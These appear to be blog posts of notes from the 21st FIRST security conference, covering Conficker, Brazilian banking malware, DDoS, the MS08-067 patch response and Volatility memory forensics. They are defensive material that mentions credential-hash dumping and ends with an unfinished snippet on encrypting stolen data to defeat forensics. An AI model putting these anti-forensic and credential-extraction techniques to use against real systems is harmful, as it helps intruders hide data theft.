Cатсн²² (in)sесuяitу / ChrisJohnRiley

Because we're damned if we do, and we're damned if we don't!


21st FIRST Conference – Day 5

Today is the last day of the conference. It’s been great so far, but it’s not over yet 😉

Security and the younger generation – Ray Stanton

This is the first time in history that many countries have 4 generations of people working alongside each other.

Who are the younger generation?

  • Language
  • Culture
  • Demands
  • Speed of learning
  • Expectations
  • Pushing the boundaries

Generation Y refers to a specific group of people born between 1982 and 2000. The majority of Gen Y have spent a significant amount of time leading an online lifestyle.

Gen Y statistics (Junco and Mastrodicasa Study 2007)

  • 97% own a computer
  • 94% own a mobile
  • 76% use Instant Messenger (15% logged in 24/7)
  • 34% use websites as their primary source of news
  • 28% author a blog and 44% read blogs
  • 49% download music using peer-to-peer file sharing
  • 75% of college students have a Facebook account
  • 60% own some type of portable music and/or video device such as an iPod

Companies must make their security policies relevant to Gen Y. Language that is easily understood and interpreted by Gen X is interpreted differently by the newer generation.

Gen X are fast at adopting the new technologies (they are also the largest group), however Gen Y are the ones who push the boundaries and innovate.

Find ways to make it work

  • Moodles – styles of education
  • Listen
  • Engage
  • Never, ever, say No! They will just go around you
  • Participate
  • Embrace

10:15 Conficker Research project – Aaron Kaplan (CERT.AT)

The guys from CERT.at gave a nice geographical representation of Conficker infection rates using a Google Earth overlay.

By looking at the scale of infections over time it was possible to create an animation showing the clean-up process in various countries around the world. Top of the list of infections were China, Brazil, and Russia.

11:00 Show me the evil: A graphical look at online crime – Dave Deitrich (Team Cymru)

Bad neighborhoods (most infected systems) – China, the US, Germany and Brazil are top. However, these are also the locations with the largest numbers of online users; as a percentage of online users, these countries are way down the list.

Charts of infections by IP ranges and statistical information are available on Team Cymru’s website.

Concentration of bot-net controllers in more developed regions – US, Germany, Korea

When tracking bot activity (Conficker), the number of bots reporting in dips on a Sunday due to systems in companies being powered off. The times at which systems reported in also supported this assumption, as most bots were reporting in within working hours (depending on the region of the bot).
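The Sunday dip is easy to surface from raw sighting data. A minimal sketch of the idea (the timestamps and the bucketing-by-weekday approach are my own illustration, not Team Cymru’s actual tooling):

```python
from collections import Counter
from datetime import datetime

# Hypothetical bot check-in timestamps (local time of the sensor)
sightings = [
    "2009-06-22 09:14", "2009-06-22 10:02",  # Monday, working hours
    "2009-06-23 11:40", "2009-06-24 14:05",
    "2009-06-28 13:55",                      # Sunday: far fewer check-ins
]

# Bucket check-ins by weekday; a dip on Sunday suggests corporate
# desktops being powered off over the weekend
per_day = Counter(
    datetime.strptime(ts, "%Y-%m-%d %H:%M").strftime("%A") for ts in sightings
)
print(per_day)
```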

DDoS tracking showed that targets in the US and Europe were most popular. However, everybody is affected, as service providers spread the cost of DDoS protection between all of their customers.

Lack of data collection in areas such as Africa is a problem when forming statistics. If more data were available, a more complete picture could be put together.

11:30 Internet Analysis System (IAS): Module of the German IT early Warning System – Martin Bierwirth/Andre Vorbach

Designed as part of a project to protect critical infrastructure. Passive sensors are located at partner sites and provide information (filtered and anonymised) on network traffic. These partners are mostly in government networks, but sensors are also installed in other partner networks.

Every five minutes a sensor transmits about 560kb of data.

IAS data privacy

  • Does not monitor data with personal reference
  • Does not reassemble TCP flows
  • Independent of IDS systems
  • Revokes the context of a packet after building its counters

Manual research on the data is done through a program developed in co-ordination with German universities. Tracking the GET requests in outbound HTTP traffic allowed BSI to check user-agent strings and identify users running insecure versions of software such as Firefox. Charting showed versions from 1.0 through to the latest (at the time of the data) 3.0.x version.

IAS provides the data needed to ask the right questions. By using profiling it is possible to automatically identify traffic patterns that are out of the norm for the network.

Example: DNS spike of traffic across 3 separate networks. By looking at the traffic it appeared to be a large number of spoofed DNS requests for the “.” record. Source IP-Addresses were spoofed. It was discovered that the 3 networks were being used as part of a reflective DDoS attack. By tracking across multiple partners it is easier to see when attacks are targeted. When monitoring government networks it is easy to think that all attacks are targeted ones.
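A crude version of the spike detection behind this example can be sketched as follows (the counts and threshold are invented for illustration; the real IAS profiling is far more sophisticated):

```python
# Per-minute counts of DNS queries for the root ("." NS) record, as a
# sensor might aggregate them (numbers invented for illustration)
counts = [12, 9, 15, 11, 10, 14, 980, 1150, 1020]

baseline = sum(counts[:6]) / 6   # average over a known-quiet period
threshold = baseline * 10        # crude spike threshold

# Flag the minutes whose query volume dwarfs the baseline -> candidate
# reflective DDoS traffic worth manual investigation
spikes = [i for i, c in enumerate(counts) if c > threshold]
print(spikes)
```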

Aggregated data extends the perspective of individual networks.

Prospects: Deploy more sensors, Automatic correlation of data

13:30 New Developments on Brazilian Phishing Malware – Jacomo Piccolini

Changes from 2008 to 2009

Malware levels have remained around the same: 30–40,000 unique samples per year. Although the quantity has remained constant, the quality has increased – less use of Delphi and Visual Basic, and a move towards Java/C++.

Targeted attacks are rare. Most attacks spread through the use of spam email giving links to users (themed attacks).

Many malware samples are using simple attacks that alter the local hosts file to redirect victims to phishing sites (password stealing, etc…). This is not rocket science. Keep it simple. Most examples concentrate on adding hosts entries for Brazilian banks.
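As a rough illustration of how simple this technique is to detect, here’s a sketch that flags tampered hosts entries (the domain list and sample are my own, not from the talk):

```python
# Flag hosts-file entries that point bank domains somewhere unexpected.
# The domain list is illustrative, not from the presentation.
BANK_DOMAINS = {"bancodobrasil.com.br", "itau.com.br"}

def suspicious_entries(hosts_text):
    hits = []
    for line in hosts_text.splitlines():
        line = line.split("#")[0].strip()  # drop comments and whitespace
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            # a bank domain mapped to a real remote IP is a red flag
            if name.lower() in BANK_DOMAINS and ip != "127.0.0.1":
                hits.append((ip, name))
    return hits

sample = "127.0.0.1 localhost\n200.98.1.2 bancodobrasil.com.br\n"
print(suspicious_entries(sample))  # [('200.98.1.2', 'bancodobrasil.com.br')]
```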


Attacks against government information systems using malware. Access to the Brazilian database gives you access to all information on a citizen (car registration, job information, income, Tax information, travel permits, Visas, family ties, personal information, arrest history, picture, gun permit information, signature, etc…). The malware uses a simple overlay to steal the logon for a user. These logons were on sale on the streets of Sao Paulo, Brazil for $1000.

This information was covered in the media in Brazil. I can’t find the footage in English, however the original is available on YouTube.

Newer malware is used to install a BHO (Browser Helper Object). This then routes all your traffic through a single proxy when the traffic meets specific criteria (in most cases access to bank websites). The proxy then redirects to another phishing server to steal the credentials. When this malware was run through VirusTotal, no AV vendor detected it.

Stronger focus on extortion malware: blocking access to documents, pictures and a range of other files. The machine then warns the user to use a specific AV product to clean the system. For $10 you can buy the (scam) AV product to regain access to your files – low-cost extortion. The malware locks the files through a “GetActiveWindow” call to block the applications. All files are still present; if you copy them off to another machine they are all available again.

DNS cache poisoning is also still an issue. On 11th April 2009 one of the biggest banks in Brazil suffered DNS poisoning, and traffic was redirected to a phishing site. The issue was resolved in 7 hours (it was a Sunday).

Brazilian Initiatives

Defensive Line website (www.linhadefensiva.org) –> a community blog that deals with end-user infections. It acts as a CSIRT team (ARIS-LD) and also provides an anti-malware tool (bankerfix). The team is looking for assistance in developing their new software solution – please check the website if you can assist them.

Malware Patrol (www.malwarepatrol.net) –> provides blocking lists for many applications (MTA, proxy, DNS…). These are updated on an hourly basis and made available for any purpose. Some files tracked by Andre are still online after 4 years of tracking.

Federal Police: Operation Trilha –> 691 law enforcement agents, 139 arrest warrants, 136 search warrants, 12 Brazilian states (28 cities), in addition to arrests in Brazil, 1 arrest was made in the US.

Malware is an alternative source of income and for some “just a job” – social issue

My take from this presentation is that the Brazilian malware economy is very internally focused. Brazilians targeting specifically other Brazilians and Brazilian banks in particular. This is something to watch in the future however, as the malware authors become more proficient they are beginning to branch out into other markets.

Overall the FIRST conference was a great experience and gave me a different perspective than my normal conferences (mostly hacker-style cons like CCC, Blackhat, etc…). The fact it was in Japan just adds to the overall effect of course. I wish I had more time to look around and really take in the culture. Hopefully I can arrange some time next year to make a long tour of Japan with my lovely girlfriend. I’m accepting donations 😉 Here’s to next year’s FIRST conference in Miami.

21st FIRST Conference – Day 3

Today’s big thing is the Volatility training from Andreas Schuster. I’ll be trying to attend some talks after the workshop is over, where possible.

09:00 Attacks Against the Cloud: Combating Denial-of-Service – Jose Nazario

Cisco anticipates that 90% of bandwidth usage will eventually be used for video services. Historically the Internet has been a nice to have. As services such as communications move to the Internet it becomes a need to have. Availability and quality of service becomes more of a serious issue. Telephony services are a key point. People need to communicate, especially in the event of an emergency. 911 emergency services need to be available all the time.

The generic definition of the cloud – “If somebody else’s stuff breaks, your business grinds to a halt”

Internet attack sizes have grown from 200Mbps in 1999 (based on code-red traffic levels) to 50 Gbps in 2009. The trend appears to be a doubling of attack bandwidth year on year.
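As a quick sanity check on the doubling claim, the compound growth rate implied by those two endpoints works out close to (though a little under) 2x per year:

```python
# Implied compound annual growth of peak attack size from the figures
# above: 200 Mbps in 1999 to 50 Gbps in 2009
start_bps, end_bps, years = 200e6, 50e9, 10
factor = (end_bps / start_bps) ** (1 / years)
print(round(factor, 2))  # ~1.74x per year, in the ballpark of doubling
```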

Historical effects of Denial of Service attacks

  • 1999 –> Routers die under forwarding load
  • 2002 –> Servers die under load
  • 2005 –> Renewed targets in infrastructure (DNS, peering points)
  • 2008 –> Web services

Service providers are now able to cope with the attack traffic. In turn this has caused the problem to move on to the customer. With the advent of caching servers and load balancers, attackers have moved to methods designed to overload backend servers with hard-to-resolve requests. This bypasses the protections put in place in most organisations.

The change of Denial of Service from fun to criminal

  • 1999 –> IRC wars lead to widespread adoption of primitive DoS/DDoS tools
  • 2001 –> Worms: Code Red, Nimda, SQL Slammer
  • 2004 –> Rise of the IRC botnets: Online attacks go criminal
  • 2007 –> Estonia attacks cause governments around the world to worry about cyberwar
  • 2009 –> Iran election results lead to DDoS, Twitter, etc…

Providers have responded by protecting their own infrastructure and using manual blackhole routing as a protection measure (2001). Providers then started to offer DoS protection as a service to customers using BGP injections (2003). Finally, providers began protecting key converged services such as VoIP and IPTV using multi-Gbps inline filtering (2007).

09:30 I am a Kanji: Understanding security one character at a time – Kurt Sauer

Teaching somebody about security is not unlike teaching somebody how to understand Japanese kanji. There are around 50,000 kanji, and they can have multiple definitions. Not an easy task.

Great presentation. I’d suggest looking at the slides/video to get the full effect. Nothing groundbreaking, but definitely worth the time.

11:00 Windows Memory Forensics with Volatility – Andreas Schuster

Like yesterday, this is more of a workshop than a presentation. I’ll post up any links / information that might be useful however. You can find the slides and workshop information (along with other good information) on Andreas’ blog

Part 1: Refresher – Memory Fundamentals, acquisition, kernel objects, analysis techniques
Part 2: Using Volatility – Volatility Overview, analysis w/ Volatility
Part 3: Programming – Developing plug-ins for volatility

PART 1: Refresher

Live Response

  • Focus on “time”
  • Acquisition and analysis in one step
    • Untrusted environment
    • Not repeatable
  • Tools tend to be obtrusive

Research from Aaron Walters and Nick Petroni (2006) details the percentage of RAM changed when a system is in an idle state and during a memory dump –> their Blackhat DC presentation from 2007 details this information. The research shows that 90% of freed process objects are still available after 24 hours of idle activity.

The focus of live response is on main memory, network status and processes. When performing memory acquisition, installing agents prior to the incident can help to minimize the impact.

Expert Witness Format – Used primarily by Encase. libewf project – Joachim Metz (http://sourceforge.net/projects/libewf/)

“powercfg /hibernate on” –> Enables hibernation from the command-line on Windows systems. More information on the powercfg command can be found on Microsoft TechNet.

Basic memory analysis: piping memory through strings and looking at interesting results. –> Remember to set ASCII/ANSI and UNICODE

  • Many false positives
  • Memory is fragmented
  • Conclusions hard to form (hard to prove connections between strings, discoveries might be misleading)
  • Obfuscation
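The basic technique is easy to sketch without external tools. A minimal pure-Python take on ASCII and UTF-16LE (Unicode) string extraction – the sample blob is invented for illustration:

```python
import re

def ascii_strings(data, min_len=4):
    # runs of printable ASCII bytes
    return [m.group().decode()
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def utf16le_strings(data, min_len=4):
    # printable ASCII chars each followed by a NUL byte (UTF-16LE),
    # the layout of most Unicode strings in Windows memory
    pat = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    return [m.group().decode("utf-16-le") for m in re.finditer(pat, data)]

# A toy "memory dump": one ASCII string, one UTF-16LE string
blob = b"\x00\x01cmd.exe\x00\x01" + "evil.dll".encode("utf-16-le")
print(ascii_strings(blob), utf16le_strings(blob))
```

Note that a plain ASCII pass misses the UTF-16LE string entirely, which is why the slides stress scanning for both encodings.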

List walking: Find the initial pointer and traverse the doubly linked process list –> also applies to singly linked lists and trees

  • Easy to subvert (anti-forensics)

Scanning: Define signature and scan the entire memory for a match

  • Slow
  • OS dependent (patches can break things)

There are also a number of hybrid methods used.
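The difference between list walking and scanning (and why scanning resists simple anti-forensics) can be shown with a toy model – all structures here are invented stand-ins for real kernel objects:

```python
# Toy illustration: a process hidden by unlinking (DKOM-style) is missed
# by list walking but still found by scanning memory for the objects.

class Proc:
    def __init__(self, name):
        self.name, self.next = name, None

# Build the "kernel" process list: a -> b -> c
a, b, c = Proc("System"), Proc("malware.exe"), Proc("lsass.exe")
a.next, b.next = b, c
memory = [a, b, c]        # everything that actually exists in RAM

a.next = c                # rootkit unlinks b from the list; the object
                          # itself is still sitting in memory

def list_walk(head):
    out, p = [], head
    while p:
        out.append(p.name)
        p = p.next
    return out

def scan(mem):
    # "signature scan": examine every object found in memory directly
    return [p.name for p in mem]

print(list_walk(a))   # hidden process missed
print(scan(memory))   # all three found, including the unlinked one
```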

PART 2: Using Volatility

Originally developed in 2006 as a tool called FATKit. This was then used as the basis for VolaTools in 2007. The VolaTools project was transferred to Microsoft through a company buyout. The project was then restarted and completely reprogrammed as an open-source project – Volatility.

The SVN version is available from http://code.google.com/p/volatility/

Standard options for Volatility are .:

-h, --help            show this help message and exit
-f FILENAME, --file=FILENAME (required) XP SP2 Image file
-b BASE, --base=BASE  (optional, otherwise best guess is made) Physical offset (in hex) of directory table base
-t TYPE, --type=TYPE  (optional, default="auto") Identify the image type (pae, nopae, auto)

For help on specific functions, volatility <function_name> -h

http://www.forensicswiki.org/wiki/List_of_Volatility_Plugins contains a list of published plug-ins for the framework

A number of functions within Volatility have been updated to improve speed and reliability. An example of this is the thrdscan/thrdscan2 function. The updated versions usually run faster than the original versions. It may be best to check the output between the older/newer versions to ensure that you are receiving consistent output and not any false positives/negatives.

volatility modules -f <memory_dump> –> outputs a list of loaded modules (driver files). The modscan2 function will give a more comprehensive list of loaded (and previously loaded) modules (if the metadata is still present in memory). The moddump function can be used to extract a module from the memory dump for further analysis.

Using scanning modules is very helpful as it will reveal information on not only what was loaded at the time of the memory dump, but also scan the entire memory for any matching signatures of what may have been loaded/unloaded prior to the dump. This is the case for not only modules, but also processes as well.

The pstree plug-in is useful to output a process tree (ASCII style).

However not all processes are listed. By using psscan2 with the “-d > output.file” option you can create a file that can be opened in ZGRViewer. This shows a full graphical output of the process list, including the start and exit time of each process. ZGRViewer also offers very helpful search functionality to help find processes within the tree.

By finding the PID of a process you can then use the files and dlllist functions to find the open files and loaded DLLs for the process in question. By running getsids you can examine which account started the process, as well as whether it was interactive or not. You can also use regobjkeys to examine which registry keys were in use by each PID. By running the procdump function (with the PID of the suspicious executable) you can extract the process into a file for further examination.

Examining open connections and sockets is also simple. Volatility has the connections function (along with connscan/connscan2) and the sockets function (along with sockscan/sockscan2). These functions output the PID of the creating process so it can be mapped back to processes discovered in the process listing performed earlier. As with a majority of the scanning functions, they may find information on sockets/connections that existed but were no longer open when the memory dump was taken.

As part of the VolReg plug-in you can also output things like the LSA secrets, as well as password hashes. These rely on information from the hivescan/hivelist functions. Performing the hashdump is something that’s been covered before on various blogs. If you want a rundown of how to perform a complete dump of password hashes, I’d suggest checking out Chris Gates’ post on the carnal0wnage blog, or the forensiczone walkthrough.

Some interesting plug-ins to explore –> cryptoscan (to search memory for TrueCrypt passphrases), malfind (to search for possible injected code), dmp2raw/raw2dmp (for converting to/from the Crash Dump format).

This was a great workshop. I’d love to have spent longer going through things. However the point was to demonstrate how to use the Volatility tool and not to teach n00bs like me how to do proper analysis. I’ll have to take the time to run through the examples and slides again to really get to know the process fully.

16:00 Incident Response for Voice Services – Lee Sutterfield

Protection of dedicated VoIP services by using a specifically designed Voice Firewall alongside existing firewall technologies. Unlike a normal IP-based firewall, a Voice Firewall is designed to restrict the actions of a user within the policy of the organisation. This includes restrictions such as limiting the destination of dialling from specific extensions (block long distance, international), limit on the time and duration of calls. It also offers the ability to restrict incoming calls to prevent access to dial-up services from unwanted numbers. This can be implemented to prevent war-dialling attacks by restricting based on the source of the call and pattern of inbound calls.

A Voice Firewall is primarily designed to prevent things like toll fraud instead of defending the system from attack. It also offers better visibility into the usage of your voice network and provides alerts when certain trigger levels are exceeded.

Another use of Voice Firewalls is blocking specific numbers to stop crank calls or active war-dialling attempts. Any calls from a flagged number are then blocked and the attempt is logged. Using this technology it is possible to protect against, and log attempts of, vishing attacks.
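The policy-driven call restrictions described above boil down to simple rule matching. A sketch of the idea (rule fields, extensions and destination classes are all invented; real products are obviously far richer):

```python
# Sketch of policy-driven call filtering of the kind a Voice Firewall
# performs. All rule fields and numbers are invented for illustration.
def allowed(call, rules):
    for rule in rules:
        if (call["src_ext"].startswith(rule["ext_prefix"])
                and call["dest_class"] in rule["blocked"]):
            return False  # call violates policy -> block and log
    return True

rules = [
    # extensions beginning with 2 (e.g. reception desks) may not
    # dial international or premium-rate destinations
    {"ext_prefix": "2", "blocked": {"international", "premium"}},
]

print(allowed({"src_ext": "2101", "dest_class": "international"}, rules))  # False
print(allowed({"src_ext": "4500", "dest_class": "international"}, rules))  # True
```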

Voice Firewalls can be used to assist with the following security points .:

  • Unauthorised modems
  • Remote access (modem) attacks
  • Phone service misuse
  • Toll fraud
  • Harassing/Threatening calls
  • Malicious software (triggering calls to pay numbers)
  • Vishing attacks
  • Denial of Service (against VoIP services)
  • Bomb threats (call recording)
  • Improve voice uptime
  • Stop data leakage
  • Reduce telecom total cost
  • Baseline/plan/optimize (new VoIP deployments)
  • Policy driven call recording

Voice Firewall technology addresses age-old vulnerabilities and provides lock-down mechanisms. This increases your ability to provide improved incident response and preventative services to the enterprise, as well as via Managed Security Services for Voice (MSSVs).

Well, we’ve hit the mid-point of the conference. It’s been great so far. Tonight we have the FIRST conference banquet. Hope they have sushi, else there might be a riot 😉

21st FIRST Conference – Day 2

I’m still not over the jet-lag, but still, day 2 of FIRST rages on. The pre-conference talk started with the announcement that Interpol has been accepted as an official FIRST member. The winners of the best-practices contest (this year’s focus was on detection of attacks) were announced, with Cisco CSIRT taking the award with a paper on NetFlow (the papers should be available on the FIRST website later today). Second place was awarded to CERT-FI.


09:00 Reconceptualizing Security – Bruce Schneier

Thinking about what security and risk means and how we deal with it. Security by definition involves human beings. We need to define how people think about security. You can have security without actually feeling secure. You can feel secure when you’re not. These are 2 different things. A separation should be made between the feeling of security and the reality of security.

Security is a trade-off: giving up something in order to gain a degree of security. However, what is given up needs to be worth the trade-off, and whether or not something is worth it comes down to a personal choice. People have a natural intuition when it comes to security. Although humans are on one hand good at evaluating their security, they can also sometimes be very bad at it. This is what drove Bruce to research “The Psychology of Security”.

Humans are built to make quick decisions. Getting the good answer fast is better than getting the best answer slow.

Humans rationalise the familiar as more secure than the unfamiliar. People are afraid to fly, yet are happy to drive, although the risk is higher: 42,000 people die every year in the US in car accidents, a figure much higher than for plane accidents. Humans overreact to rare risks more than the risks we accept every day. We are more likely to stop doing something if a close friend is affected than if many people we don’t know are affected.

The economic incentive is to make people feel secure. However the feeling and reality don’t always match.

Discussion of the various mental models based on experience, press, government, industry and human feelings. Humans are better at focusing on short-term risks, and are very bad at assessing risks that are far off.

Security decisions are often made for reasons with nothing to do with security. The person making the decision will manipulate the model based on their view of reality and their requirements. Stakeholders will try to convince others that their views are correct.

If you believe something, then evidence against that belief will often be ignored, while positive evidence will reinforce that belief.

Flashbulb moments change people’s mental models – the 9/11 terrorist attacks and the JFK assassination are examples of US flashbulb moments. Each culture has its own.

Change happens slowly. Even easy changes, such as changing people’s smoking habits, have taken decades. People are quick to reject new models if they don’t agree with their feelings. Our feeling on global warming (what we see in front of us) doesn’t always agree with the new scientific model of what will happen.

Security reality and security feeling should be balanced. If people feel insecure they will not trust the technology, if they feel too secure they will be at risk.

All effort is put into feeling secure. Some part of that, however, spills over into the reality of being secure. Some things that are implemented to increase the feeling of security in fact lower the reality of security.

Building a surveillance infrastructure makes us less secure.

Economics doesn’t support security and reliability. Features are the main driving force in technology.

11:00 Network Monitoring Special Interest Group: Monitoring & Analyzing Client-side Attacks

This special interest group was in the form of a workshop.

You can download the vmware image (Debian), PDFs and PCAP files used in the workshop – HERE.

The demos focus on client-side / drive-by downloads using examples for fast-flux and non-fast-flux style attacks. The workshop uses a downloadable Debian VM with some self developed tools (based on Rhino).

I opted to skip the afternoon section of the workshop. I’ll work on the exercises on the plane home 😉

13:30 Comprehensive Response: A Bird’s eye view of Microsoft Critical Security Update MS08-067 – Microsoft

Microsoft Security Response Center / Microsoft Malware Protection Center give an overview of Microsoft’s response to the MS08-067 vulnerability and the rise of conficker.

The MSRC has 3 main areas of responsibility .:

  • Investigate and Resolve Vulnerability Reports
  • Microsoft Security Response Process
  • Building Relationships and Communications

When releasing a security update Microsoft follow a dual track to manage and deal with the patching process

  1. Vulnerability Reporting
  2. Triaging
  3. Managing Finder Relationship
  4. Content Creation
  5. Release

In tandem with the above process (at steps 2-4), a technical fix is developed and tested.

  1. Creating the Fix
  2. Testing
  3. Update Dev Tools and Practices

A lot of effort is put into the testing phase to ensure that the patch deals with the issue, doesn’t create other issues (security or non-security related), and is compatible with other products.

Microsoft release day means staff getting in at 6am to monitor the process and make sure everything runs smoothly.

MS08-067 (October 2008)

  • Vulnerability found in Windows Server Service (netapi32.dll)
  • Wormable
  • Large install base
  • Exploit and limited attacks known; widespread malware probable

This vulnerability was discovered through the customer support services department: a specific crash was reported by a customer who was experiencing issues. It was originally thought to be another attack attempt against the flaw patched in MS06-040. During further research it was found to be a separate vulnerability.

The vulnerable function is the ConvertPathMacros function

  • Exposed via anonymous RPC endpoint
  • Replaces path macros (\..\ and \.\)
    • Normal usage \foo\bar\..\bas -> \foo\bas
    • Normal usage \foo\bar\.\bas -> \foo\bar\bas

The attack string forces ConvertPathMacros to look back into the stack for the previous slash. Some pre-staging of the attack must be done to trigger the exploit.
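Roughly, the macro replacement can be pictured like this (my own Python model, not the actual netapi32 code; the bug was, in essence, that looking back for the previous slash could walk past the start of the path):

```python
def collapse_path_macros(path):
    # Rough model of the canonicalization ConvertPathMacros performs.
    # This is NOT the real netapi32 code, just an illustration.
    parts = []
    for comp in path.split("\\"):
        if comp == "..":
            if parts and parts[-1]:   # bounds check: the real function
                parts.pop()           # could be tricked into stepping
        elif comp != ".":             # back too far
            parts.append(comp)
    return "\\".join(parts)

print(collapse_path_macros(r"\foo\bar\..\bas"))  # \foo\bas
print(collapse_path_macros(r"\foo\bar\.\bas"))   # \foo\bar\bas
```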

By using fuzzing it was possible to trigger the vulnerability and search for possible variations of the attack. Microsoft didn’t want to fix netapi32.dll again (after already fixing it in MS06-040 and MS06-070), so all cases were tested to make sure it was done right.

MAPP partners were provided with packet captures, safe PoC, technical description, information about the malware currently exploiting the vulnerability, stack traces.

Through the security bulletin customers were given workarounds – Block SMB, Stop services, Vista\WS08 RPC firewall rule to block UUID, Chacl tool to change named pipe ACL

Response Timeline .:

Oct 6th – Received notification of vulnerability
Oct 6th – Reproduced vulnerability on reported platform (XP SP2)
Oct 6th-10th – Began testing other affected platforms
Oct 10th-22nd – Fix developed and core baseline of testing completed (due to out-of-band release)
Oct 23rd – Patch pushed out through all update platforms (WSUS, Windows Updates, etc…)

The process of releasing this patch was compressed from a 2 month process into a 17 day process due to the severity. Despite this work, customers complained about the patch coming out-of-band. Microsoft rarely release out-of-band patches (In 2008 Microsoft only released 2 out-of-band patches).

Analysis showed that malware was exploiting this flaw beginning on 13/08/2008 – These were targeted attacks designed to drop TrojanSpy:Win32/Gimmiv onto the system. Data was then collected and sent to a server in Japan. Detection for Gimmiv was added into the MSRT tool in November.

After the patch was released more trojans began to use the exploit (Trojan:Win32/Wecorl, Trojan:Win32/Clort). The first worm using this exploit (Conficker) was seen on 21st November. The code used in Conficker didn’t appear to be linked to the earlier team who developed Wecorl/Clort.

The name Conficker was from a string found while Microsoft analyzed the original variant (Traffic-converter.biz).

Conficker B was less about exploiting vulnerabilities and more about testing company best practices (weak passwords, autorun, local administrative permissions, etc…)

Comparison between the various versions of Conficker.

  • Variant A – Spread only through the MS08-067 exploit
  • Variant B – Began to brute-force network shares, infecting network/removable drives, and using scheduled tasks to run the worm on remote machines.
  • Variant C – No new infection methods – Added P2P communications
  • Variant D – No infection required – distributed as an update to previously infected systems (B and C variants)
  • Variant E – No infection required – distributed as an update to previously infected systems (B, C and D variants)

It’s impossible for one vendor to do everything alone. Collaboration across the industry is vital in fighting people who distribute malware.

Around 100 people at Microsoft worked on the MS08-067 / Conficker problem between all phases of the incident. This raises an issue of scalability. If multiple issues like Conficker hit at the same time, then there may be problems handling the load (as yet untested).

16:00 INTERPOL Initiatives to Enhance Cyber Security – Vincent Danjean

Interpol was created in 1923 and is the world’s largest international police organisation, with 187 member countries.

There were a lot of statistics and information presented on success stories. I’d suggest taking a look at the slides, as there is very little point in me reprinting the statistics and facts. The information is a little dry however, so you have been warned 😉

Well, that’s the end of day 2. It’s been another long day. Time for that beer…

I managed to have a long chat with Sherri Davidoff and Jonathan Ham today after the client-side attack workshop. Jonathan managed to finish the first exercise within a few minutes, while most of us were still looking for the right PCAP file. His strategy for the analysis was so straightforward, but very effective for quick analysis of captures. I always enjoy talking to people smarter than me (it happens a lot) as I get to learn something new. I’m looking forward to Sherri’s talk at Defcon as well. It sounds like it’ll be really interesting.

Tonight is the vendor showcase. Normally I shy away from that kind of marketing event, but they have beer 😉 Tomorrow I’ll be attending the Volatility workshop held by Andreas Schuster (it’s going to be a day of fun playing in memory). So the blog might be a little short tomorrow. Maybe that’s a good thing though. I talk too much…

21st FIRST Conference – Day 1

Well I’m finally over my jet-lag, ok, almost over my jet-lag, and day 1 of the 21st FIRST conference is just about complete. I managed to hit a few interesting talks today. Not all of them were public information, but I’ve written up some notes from the ones that were for your enjoyment. Short note: this isn’t a high-tech conference like Blackhat, so if you think the information is a little high-level, then you’ll understand why. The focus of the conference is more on Incident Response and Handling than my usual attack-vectors stuff, but so far it’s been a great experience. Hope you enjoy the write-up.


09:00 Information Security Management and Economic Crisis – Suguru Yamaguchi

I know that keynotes are usually meant to be dry and a little bit boring (sorry, but you can’t sugar coat the truth), however I decided to risk it and pop in to see what was on offer. It seems that nobody told Mr Yamaguchi that he was meant to be boring, which made for a bit of a surprise. After a quick guide to what to see in Kyoto (along with shopping tips) and some historical information about Japan (and why the food is much better here in Kyoto than in Tokyo), the talk moved into the more serious side of risk management in the current economic climate. The topics covered were varied, so stay with me if it seems a little chaotic.

Economic Crisis / time of “less”

The initial focus was on the use of technology in Japan to automate and streamline services such as speed/control systems used in the Japanese bullet trains, management of the Tokyo underground network, RFID for stock tracking/distribution management (to automate shipping of stock to locations depending on demand) and water control/flow management. The use of technology is also now working its way into smaller businesses such as taxi services (using TCP/IP connected terminals in the cabs to transmit requests and improve management of services). IT is now a vital component of all businesses; not just the large multi-nationals, but also smaller businesses are becoming more reliant on these systems for everyday business purposes.

“perimeter protection model” doesn’t work anymore

With the increase in outsourcing, ASP, SaaS and cloud computing, the perimeter is much more fluid and undefined. Services are now provided by entities in other countries, each with different rules, laws and standards.

Risks have changed dramatically

  • Quality and Quantity of “attacks”
  • Economic damages
  • Who is attacking / being attacked

“Public Private Partnership” –> Government policy to encourage knowledge sharing across business domains (especially critical infrastructure)

Main goals set in 2006 (in Japan), new goals to be reviewed in 2009 .:

  • More preparedness
  • More scientific approach
  • Share risk between business and government

The economic crisis has caused costs to be cut in various ways: less investment in information systems (including information security management), and a slow-down of innovations, upgrades and improvements. As headcount lowers, companies are unable to innovate and adapt as easily as before.

Mission impossible for system operators: lower budgets, less staff and an increase in security incidents (a rise in data loss/theft issues). Cost savings and security assistance can be achieved through the use of virtualization and BYO (Bring Your Own) laptop schemes. BYO means using personal laptops for business purposes, based on virtualization or thin-client solutions; it reduces costs and can help improve security.

Real-time 3D visualization by Nicter (Network Incident analysis Center for Tactical Emergency Response)

Use of visualization to compare attack traffic to normal traffic. Using this technique it is easy to see portscans, DoS attempts and a variety of other attack types visually and in real-time. It helps streamline information management at a time when fewer people need to do more.

Invisible computers are a growing risk: electronics that are not traditional computers, but operate on TCP/IP networks (HD-recorders, set-top boxes, etc.). These systems are more vulnerable and open to abuse. Attacks routed through these devices have started to be seen in the wild in Japan.

13:30 Proprietary data leaks: Response and Recovery – Sherri Davidoff / Johnathon Ham

Scenario: Attacker has physical access

Attacker Profile: Staff member, cleaning staff, security guards, etc…

Spybase Wireless Keylogger ($285 Amazon)

  • Install once and access through wireless to download the data
  • Staff are unaware/untrained on how to check a system for a keylogger

Questions to ask in a response scenario

  • How long has the keylogger been installed ?
  • Who planted it ?
  • What information has been exposed ?
  • What other systems could be exposed ?

Keyloggers have serial numbers, and many manufacturers will provide information on sales to law enforcement in the event of an incident. Track other systems that have had the same device installed; often the attacker has tested it on his/her own machine first. If this is an internal staff member, then this may be a source of information.

USB devices come in many different formats: pens, wristbands, iPods, sushi (yes, as seen in Johnny Long’s presentation), and there are many different places to hide things like micro-SD cards. Ironkey have a professional USB stick that supports remote wipe. If you recover this kind of USB device in an incident response, store it in a suitable (Faraday) bag to block incoming wipe commands.

Sherri performed a live demo showing how easy it is to download data from a system to a phone connected through USB. By encrypting the data and deleting the key afterwards, it is possible to prevent a responder from identifying what data was copied.
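
As a toy illustration (not from the demo itself, and with a made-up filename), here is why encrypt-then-destroy-the-key defeats after-the-fact analysis: with a random one-time-pad key, the ciphertext alone tells a responder nothing about what left the machine.

```python
import os

def xor_encrypt(data: bytes, key: bytes) -> bytes:
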